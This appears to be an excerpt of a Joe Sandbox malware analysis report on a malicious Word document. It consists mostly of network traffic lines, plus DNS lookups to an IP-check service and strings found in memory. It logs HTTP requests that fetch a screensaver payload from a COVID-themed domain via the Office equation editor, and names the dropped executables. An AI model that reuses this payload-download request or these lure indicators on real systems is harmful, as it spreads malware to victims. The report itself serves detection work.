                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.26.12.205:443 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 104.26.13.205:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: Joe Sandbox ViewIP Address: 172.67.175.222 172.67.175.222
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeDNS query: name: api.ipify.org
                    Source: global trafficHTTP traffic detected: GET /xobizx.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F50586BA-2E23-4FD0-A214-B66A4504F162}.tmpJump to behavior
                    Source: global trafficHTTP traffic detected: GET /xobizx.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: unknownDNS traffic detected: queries for: covid19help.top
                    Source: obimohohj75.scr, 0000000E.00000002.626533099.000000000266B000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005466000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000376000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOR
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000376000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr.2.dr, pgZzUFYKXcIRkU.exe.5.dr, xobizx[1].scr.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000376000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr.2.dr, pgZzUFYKXcIRkU.exe.5.dr, xobizx[1].scr.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005466000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
